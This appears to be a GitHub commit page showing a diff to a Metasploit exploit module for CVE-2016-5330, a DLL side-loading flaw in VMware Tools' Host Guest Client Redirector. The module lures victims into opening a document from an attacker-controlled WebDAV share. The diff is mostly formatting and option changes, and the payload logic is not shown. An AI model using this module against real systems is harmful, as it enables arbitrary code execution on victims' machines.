Skip to content

Commit 51c457d

Browse files
committed
Update vmhgfs_webdav_dll_sideload
1 parent dae1679 commit 51c457d

File tree

1 file changed

+19
-22
lines changed

1 file changed

+19
-22
lines changed

modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb

Lines changed: 19 additions & 22 deletions
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,3 @@
1-
# Based on WebDAV Application DLL Hijacker module
21
require 'msf/core'
32

43
class MetasploitModule < Msf::Exploit::Remote
@@ -9,54 +8,52 @@ class MetasploitModule < Msf::Exploit::Remote
98

109
def initialize(info = {})
1110
super(update_info(info,
12-
'Name' => 'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector',
13-
'Description' => %q{
11+
'Name' => 'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector',
12+
'Description' => %q{
1413
A DLL side loading vulnerability was found in the VMware Host Guest Client Redirector,
1514
a component of VMware Tools. This issue can be exploited by luring a victim into
1615
opening a document from the attacker's share. An attacker can exploit this issue to
1716
execute arbitrary code with the privileges of the target user. This can potentially
1817
result in the attacker taking complete control of the affected system. If the WebDAV
1918
Mini-Redirector is enabled, it is possible to exploit this issue over the internet.
2019
},
21-
'Author' => 'Yorick Koster',
22-
'License' => MSF_LICENSE,
23-
'References' =>
20+
'Author' => 'Yorick Koster',
21+
'License' => MSF_LICENSE,
22+
'References' =>
2423
[
2524
['CVE', '2016-5330'],
2625
['URL', 'https://securify.nl/advisory/SFY20151201/dll_side_loading_vulnerability_in_vmware_host_guest_client_redirector.html'],
2726
['URL', 'http://www.vmware.com/in/security/advisories/VMSA-2016-0010.html'],
2827
],
2928
'DefaultOptions' =>
3029
{
31-
'EXITFUNC' => 'thread',
32-
'PAYLOAD' => 'windows/exec',
33-
'CMD' => 'C:\\Windows\\System32\\calc.exe',
30+
'EXITFUNC' => 'thread'
3431
},
35-
'Payload' => { 'Space' => 2048, },
36-
'Platform' => 'win',
37-
'Targets' =>
32+
'Payload' => { 'Space' => 2048, },
33+
'Platform' => 'win',
34+
'Targets' =>
3835
[
39-
[ 'Windows x64', {'Arch' => ARCH_X64,} ],
40-
[ 'Windows x86', {'Arch' => ARCH_X86,} ],
36+
[ 'Windows x64', {'Arch' => ARCH_X86_64,} ],
37+
[ 'Windows x86', {'Arch' => ARCH_X86,} ]
4138
],
42-
'Privileged' => false,
39+
'Privileged' => false,
4340
'DisclosureDate' => 'Aug 5 2016',
44-
'DefaultTarget' => 0))
41+
'DefaultTarget' => 0))
4542

4643
register_options(
4744
[
48-
OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ]),
49-
OptString.new('URIPATH', [ true, "The URI to use (do not change)", "/" ]),
50-
OptString.new('BASENAME', [ true, "The base name for the docx file", "Document1" ]),
51-
OptString.new('SHARENAME', [ true, "The name of the top-level share", "documents" ]),
45+
OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ]),
46+
OptString.new('URIPATH', [ true, "The URI to use (do not change)", "/" ]),
47+
OptString.new('BASENAME', [ true, "The base name for the docx file", "Document1" ]),
48+
OptString.new('SHARENAME', [ true, "The name of the top-level share", "documents" ])
5249
], self.class)
5350

54-
deregister_options('SSL', 'SSLVersion', 'SSLCert') # no SSL
51+
# no SSL
52+
deregister_options('SSL', 'SSLVersion', 'SSLCert')
5553
end
5654

5755

5856
def on_request_uri(cli, request)
59-
6057
case request.method
6158
when 'OPTIONS'
6259
process_options(cli, request)

0 commit comments

Comments
 (0)